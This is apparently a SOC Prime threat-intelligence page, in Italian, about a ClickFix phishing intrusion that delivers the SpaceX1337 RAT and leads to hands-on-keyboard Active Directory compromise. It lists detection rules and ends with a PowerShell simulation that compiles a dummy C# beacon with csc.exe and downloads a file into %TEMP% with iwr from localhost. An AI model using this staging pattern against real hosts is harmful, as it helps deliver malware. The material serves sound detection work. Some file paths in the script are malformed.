SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix porta al compromesso AD con accesso alla tastiera

Author Photo
SOC Prime Team linkedin icon Segui
SpaceX1337 ClickFix porta al compromesso AD con accesso alla tastiera
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

Un avversario ha utilizzato un’esca di phishing ClickFix per distribuire il RAT SpaceX1337, seguito da un’infezione multistadio che coinvolge RAT di base come NetSupport, AsyncRAT e Remus. L’intrusione è progredita dal furto di credenziali automatizzato ad attività interattiva a tastiera contro Active Directory. L’attaccante ha tentato infine il movimento laterale verso un controller di dominio e l’attacco tramite inserimento di credenziali contro un portale VPN.

Indagine

L’intrusione è stata catturata all’interno di una honeynet Active Directory completamente strumentata, fornendo visibilità end-to-end tramite la telemetria di EDR, Zeek e Suricata. I ricercatori hanno tracciato l’attività dal primo downloader PowerShell attraverso una vasta ricognizione ADSI/LDAP e movimento laterale tramite SMB. L’indagine ha chiaramente identificato la transizione dall’esecuzione automatica di malware all’interazione diretta da parte di un operatore umano.

Mitigazione

Le organizzazioni dovrebbero imporre controlli rigorosi sull’esecuzione di PowerShell e monitorare relazioni genitore-figlio di processi sospetti, inclusi explorer.exe che genera PowerShell. I team di sicurezza dovrebbero individuare la compilazione sul computer host tramite csc.exe e l’abuso di LOLBins come certutil or bitsadmin per i download esterni. Active Directory dovrebbe essere inoltre rafforzata rimuovendo dati sensibili dagli attributi LDAP e monitorando query LDAP anomale.

Risposta

Se viene rilevata attività sospetta, i soccorritori degli incidenti dovrebbero isolare gli endpoint compromessi e revocare le credenziali eventualmente compromesse degli account di servizio e degli amministratori di dominio. Le indagini dovrebbero prioritizzare l’identificazione di più famiglie di RAT e la verifica di attività programmate non autorizzate o modifiche al registro. Anche i log VPN dovrebbero essere esaminati per tentativi di inserimento di credenziali provenienti da infrastrutture note come dannose.

Flusso dell’Attacco

Rilevamenti

Esecuzione di Python da cartelle sospette (via cmdline)

Team SOC Prime
13 Ago 2026

Voce RunMRU sospetta con semantica LOLBin (via registry_event)

Team SOC Prime
13 Ago 2026

Esecuzione di comandi su host remoto utilizzando Windows Remote Management (via cmdline)

Team SOC Prime
13 Ago 2026

Possibile enumerazione/manipolazione di account o gruppi (via cmdline)

Team SOC Prime
13 Ago 2026

Scoperta sospetta di fiducia di dominio (via cmdline)

Team SOC Prime
13 Ago 2026

Possibile scoperta di configurazione di rete del sistema (via cmdline)

Team SOC Prime
13 Ago 2026

Eseguibile sospetto contenente solo numeri nel nome (via cmdline)

Team SOC Prime
13 Ago 2026

LOLBAS Schtasks (via cmdline)

Team SOC Prime
13 Ago 2026

Utilizzo di Certutil per la codifica dei dati e operazioni di certificato (via cmdline)

Team SOC Prime
13 Ago 2026

LOLBAS Bitsadmin (via cmdline)

Team SOC Prime
13 Ago 2026

Possibile dump di SAM/SYSTEM/SECURITY (via cmdline)

Team SOC Prime
13 Ago 2026

Chiamata a metodi .NET sospetti da Powershell (via powershell)

Team SOC Prime
13 Ago 2026

Comunicazione di dominio Trycloudflare sospetta (via dns)

Team SOC Prime
13 Ago 2026

Tentativi di comunicazioni di lookup IP possibili (via dns)

Team SOC Prime
13 Ago 2026

IOC (HashSha256) da rilevare: Da ClickFix SpaceX1337 ad attacco AD Hands-on-Keyboard

Regole AI SOC Prime
13 Ago 2026

IOC (HashMd5) da rilevare: Da ClickFix SpaceX1337 ad attacco AD Hands-on-Keyboard

Regole AI SOC Prime
13 Ago 2026

IOC (SourceIP) da rilevare: Da ClickFix SpaceX1337 ad attacco AD Hands-on-Keyboard

Regole AI SOC Prime
13 Ago 2026

IOC (DestinationIP) da rilevare: Da ClickFix SpaceX1337 ad attacco AD Hands-on-Keyboard

Regole AI SOC Prime
13 Ago 2026

Regola Sigma ad alta fedeltà per la comunicazione SpaceX1337 e AdaptixC2 [Connessione di Rete Windows]

Regole AI SOC Prime
13 Ago 2026

Rilevamento della compilazione del Beacon AdaptixC2 e del loader PowerShell [Creazione di Processi Windows]

Regole AI SOC Prime
13 Ago 2026

Esecuzione della Simulazione

Prerequisito: Il controllo pre-volo di telemetria e baseline deve avere esito positivo.

Ragioni: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per innescare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa e Comandi di Attacco: Un avversario ha ottenuto l’accesso iniziale tramite un link di phishing. Per evitare di portare su disco un .exe maligno noto, lasciano cadere un piccolo .cs file sorgente. Successivamente invocano csc.exe per compilare questa sorgente in un eseguibile Windows funzionale (svc.exe) situato nella %TEMP% directory. Immediatamente dopo la compilazione, l’attaccante utilizza PowerShell per recuperare un loader di seconda fase da un server C2 remoto (simulato tramite un listener locale) utilizzando l’alias iwr (Invoke-WebRequest), salvandolo nella cartella temp per completare il processo di staging.

  • Script di Test di Regressione:

    # 1. Creare un file sorgente dummy C# per simulare la sorgente di AdaptixC2
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Simulare la compilazione csc.exe (Triggers selection_csc)
    # Nota: Utilizziamo le esatte bandiere specificate nella logica di rilevamento
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Simulare il download PowerShell (Triggers selection_powershell)
    # Usiamo 'iwr' e lo specifico percorso OutFile per corrispondere alla logica
    # Utilizzando un URL inesistente per evitare traffico di rete effettivo, ma la riga di comando corrisponderà
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Comandi di Pulizia:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue